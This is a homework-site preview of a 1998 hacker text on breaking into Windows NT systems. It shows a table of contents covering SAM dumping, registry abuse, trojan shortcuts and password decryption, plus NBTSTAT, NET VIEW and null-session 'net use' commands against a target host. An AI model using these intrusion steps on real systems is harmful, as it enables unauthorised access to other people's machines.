ntexploits - Windows NT Deconstruction Tatics Step by Step...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
Windows NT Deconstruction Tatics Step by Step NT Explotation Techniques vacuum@technotronic.com Revision 5 10/01/98 Changes in Revision 5: Refined some NET.EXE examples. Included brief discussion of NetBus. Samba rdisk /s information. Made this .zip more like a unix rootkit by included all the mentioned tools. Cleaned up the overall layout. I. Initial Access Strategy 1.)NetBIOS Shares Using Microsoft Executables a. NET.EXE 's other uses 2.)NAT The NetBIOS Auditing Tool II.FrontPage Exploitation 1.)FrontPage password decryption on unix servers with frontpage extensions. III. Registry Vulnerabilities 1.) rdisk /s to dump the SAM (Security Account Manager) 2.) gaining access to the regisry with the AT.EXE command (local) 3.) REGEDT32.EXE and REGEDIT.EXE 4.) REGINI.EXE and REGDMP.EXE remote registry editing tools 5.) Using the Registry to Execute Malicious Code IV. Trojan .lnk (shortcuts) 1.)Security hole within winnt\profiles and login scripts V. Workarounds for common sytsem policy restrictions VI. PWDUMP Example Included Files: NTExploits.txt this document samproof.txt example of the sam hive from the registry notepad.reg Example .reg file that starts up notepad.exe upon login. Could be service.pwd Service.pwd frontpage password example. NetBIOS Shares Using the standard Microsoft Executables C:\>NBTSTAT -A 123.123.123.123 C:\>NBTSTAT -a www.target.com NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D After a NetBIOS share is found, it can be added to the LMHOSTS file.
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
Computername <03> UNIQUE Registered by the messenger service. This is the compute to be added to the LMHOSTS file which is not necessary t NAT.EXE but is necessary if you would like to view the r computer in Network Neighborhood. Example of LMHOSTS file: 123.123.123.123 student1 24.3.9.12 target2 Now you can use the find computer options within NT or 95 to browse the shares. An alternative option would be to use the very powerful NET.EXE C:\>net view 123.123.123.123 C:\>net view \\student1 Shared resources at 123.123.123.123 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ shares are hidden and are not shown. To connect to the ipc$ using a null session: C:\net use \\111.111.111.111\ipc$ "" /user:"" The command completed successfully. To connect to a normal share:
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

This note was uploaded on 08/08/2011 for the course CS 101 taught by Professor Jitenderkumarchhabra during the Summer '11 term at National Institute of Technology, Calicut.

Page1 / 13

ntexploits - Windows NT Deconstruction Tatics Step by Step...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online